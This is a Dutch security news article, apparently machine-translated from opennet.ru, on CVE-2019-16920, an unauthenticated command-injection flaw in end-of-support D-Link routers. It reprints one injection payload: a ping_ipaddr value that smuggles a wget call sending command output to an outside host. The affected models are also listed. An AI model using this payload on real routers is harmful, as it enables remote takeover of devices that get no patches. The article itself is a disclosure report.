Op afstand exploiteerbare kwetsbaarheid in D-Link-routers

In draadloze D-Link-routers geïdentificeerd gevaarlijke kwetsbaarheid (CVE-2019-16920), waarmee u op afstand code op het apparaat kunt uitvoeren door een speciaal verzoek te sturen naar de “ping_test”-handler, die zonder authenticatie toegankelijk is.

Interessant is dat volgens de firmware-ontwikkelaars de “ping_test”-aanroep alleen mag worden uitgevoerd na authenticatie, maar in werkelijkheid wordt deze hoe dan ook aangeroepen, ongeacht het inloggen op de webinterface. Met name wanneer het script apply_sec.cgi wordt geopend en de parameter “action=ping_test” wordt doorgegeven, wordt het script omgeleid naar de authenticatiepagina, maar wordt tegelijkertijd de actie uitgevoerd die is gekoppeld aan ping_test. Om de code uit te voeren werd in ping_test zelf een andere kwetsbaarheid gebruikt, die het ping-hulpprogramma aanroept zonder de juistheid van het IP-adres dat ter test is verzonden, goed te controleren. Om bijvoorbeeld het wget-hulpprogramma aan te roepen en de resultaten van de opdracht “echo 1234” naar een externe host over te dragen, geeft u eenvoudigweg de parameter “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// op test.test/?$(echo 1234)".

Op afstand exploiteerbare kwetsbaarheid in D-Link-routers

De aanwezigheid van de kwetsbaarheid is officieel bevestigd in de volgende modellen:

  • DIR-655 met firmware 3.02b05 of ouder;
  • DIR-866L met firmware 1.03b04 of ouder;
  • DIR-1565 met firmware 1.01 of ouder;
  • DIR-652 (er wordt geen informatie verstrekt over problematische firmwareversies)

De supportperiode voor deze modellen is al verlopen, aldus D-Link hij verklaarde, die geen updates voor hen uitbrengt om de kwetsbaarheid te elimineren, raadt het gebruik ervan niet aan en adviseert ze te vervangen door nieuwe apparaten. Als beveiligingsoplossing kunt u de toegang tot de webinterface beperken tot uitsluitend vertrouwde IP-adressen.

Later werd ontdekt dat er ook een kwetsbaarheid was beïnvloedt modellen DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 en DIR-825, plannen voor het vrijgeven van updates waarvoor nog niet bekend zijn.

Bron: opennet.ru

Voeg een reactie